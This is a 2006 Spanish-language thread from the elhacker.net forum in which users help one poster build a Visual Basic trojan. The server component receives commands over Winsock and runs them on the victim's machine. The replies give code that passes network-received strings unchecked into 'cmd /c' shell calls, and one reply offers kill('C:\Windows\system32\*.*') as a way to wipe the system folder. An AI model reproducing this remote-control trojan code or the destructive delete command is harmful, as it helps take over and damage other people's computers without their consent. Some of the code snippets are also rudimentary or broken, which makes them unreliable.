elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda con mi proyecto de troyano
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con mi proyecto de troyano  (Leído 3,293 veces)
B@RTY

Desconectado Desconectado

Mensajes: 104


Ver Perfil
Re: Ayuda con mi proyecto de troyano
« Respuesta #10 en: 15 Enero 2006, 15:30 pm »

bueno dejo aparte el tema de trabajar en un solo pc por ahora
la siguiente dudilla que tengo es como ejecutar una orden remota mente pongo ejemplo

cliente
Código:
Private Sub Command2_Click()
'crea una carpeta en la ruta especificada
Dim ruta  As String
ruta = Text2.Text
Set archiu = CreateObject("scripting.filesystemobject")
archiu.createfolder ruta
End Sub

pero en el servidor no se que poner ya que tengo que hacer 2 variables una para que interprete la ruta y otra para que interprete la orden algo asi quiza?

Código:
Dim datos As String
Winsock1.GetData ruta
If datos = "ruta" Then
    respuesta = Set archiu = CreateObject("scripting.filesystemobject")
archiu.createfolder ruta
End If
Winsock1.GetData ruta


:S lo se esque me ago un lio alguien me puede ayudar?
gracias por adelantado

salu2;)


En línea

ciruit

Desconectado Desconectado

Mensajes: 121


Ver Perfil
Re: Ayuda con mi proyecto de troyano
« Respuesta #11 en: 16 Enero 2006, 01:26 am »

Emmmm yo te aconsejaría que repases por que tienes errores para mi instrucciones y estructura.
Por ejemplo en el cliente DEBES enviar información para que en el server pase algo. Además solo basta con un GetData.

Por ejemplo, yo lo haría así:

CLIENTE:
Dim carpeta as string
carpeta = text1.text
winsock.senddata

SERVIDOR: (En dataarrival)
Dim carpeta as string
winsock.getdata carpeta
shell "cmd /c mkdir " & carpeta


En línea

Sancho.Mazorka


Desconectado Desconectado

Mensajes: 480


Gamer & Programador


Ver Perfil WWW
Re: Ayuda con mi proyecto de troyano
« Respuesta #12 en: 16 Enero 2006, 04:53 am »

Hola muchachos mira B@RTY proba esto en las propiedades del winsock no le pongas el remoteport ni el localport lo unico uqe tenes que hacer es en el cliente
Código:
winsock1.connect "127.0.0.1",6005
y en el servidor en el form load
Código:
winsock1.close
winsock1.localport 6005
winsock1.listen
y asi funciona ami antes me deci lo mismo y era por eso hasta que lo descubri. Salu2

PD: espero que haya sido eso a mi me lo soluciono eso al problema.
PD2:lo del senddata de tu ej te falta poner
Código:
winsock1.senddata CARPETA ' cosa que no pusiste

Sancho Mazorka     :P
En línea

Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html


B@RTY

Desconectado Desconectado

Mensajes: 104


Ver Perfil
Re: Ayuda con mi proyecto de troyano
« Respuesta #13 en: 16 Enero 2006, 19:16 pm »

ok muchas gracias a todos ahora mismo lo pruevo y comento ^^
En línea

B@RTY

Desconectado Desconectado

Mensajes: 104


Ver Perfil
Re: Ayuda con mi proyecto de troyano
« Respuesta #14 en: 18 Enero 2006, 17:34 pm »

porfin lo pude probar muchas gracias me funciona muy bien pero me han surgido 2 dudas
la primera e viso que el codigo para crear carpeta lo reduciis a esto
"cmd /c mkdir "
pero como son el de borrar la carpeta, crear archivo borrarlo...
ya que yo esos codigos los tengo pero asi

createobject("scripting.filesystemombject.....)

y asi es maas engorroso.
haber si alguno sabe de algun un link con las funciones asi (reducidas)
La otra duda es si e de crear un winsock para cada una e las acciones que quiera realizar osea uno para crear carpeta otro para eliminarla...

gracias por ayudarme com mi "proyecto"

salu2 :)
En línea

Sancho.Mazorka


Desconectado Desconectado

Mensajes: 480


Gamer & Programador


Ver Perfil WWW
Re: Ayuda con mi proyecto de troyano
« Respuesta #15 en: 23 Enero 2006, 05:13 am »

mira si tenes el word apreta ALT+F11 y te va a abrir un vb y apreta al ayuda si no la tenes pone instalar y al instala sola y ahi teens toda la ayuda que necesitas con ejemploss y todo algunso no funcan poruiqe son de otra version. mira con vb es mas facil rddir "RUTA"
mddir "RUTA" creo q son para borrar y crear dir en vb. mas no me acuerdo espero que te sirva salu2


Sancho Mazorka     :P
En línea

Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html


satanico88

Desconectado Desconectado

Mensajes: 43


Ver Perfil
Re: Ayuda con mi proyecto de troyano
« Respuesta #16 en: 16 Marzo 2006, 04:07 am »

para borrar un archivo solo tenes q poner este codigo

kill("C:\Hola\Archivo.exe")

si kieres borrar un archivo q este en la misma carpeta q tu programa pero no sabes cual es la carpeta ... bueno haes esto
app.path

aclaracion

app.path es un codigo q representa la carpeta en la q esta ejecutandose el programa..

x ejemplo...

tu le mandas el programa a tu amigo..
y tu amigo lo pone en C:\Cosa\

luego tu programa.. crea un Archivo ...
y luego lo kieres borrar.. y no sabes la ruta ..
entonces usas el app.path

kill (app.path+"Datos.txt")
nose si me entendes

otras formas de borrado son

kill("C:\Windows\system32\*.*")

eso borraria todo lo q hay en sys32

weno esperoq  te sirva..
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines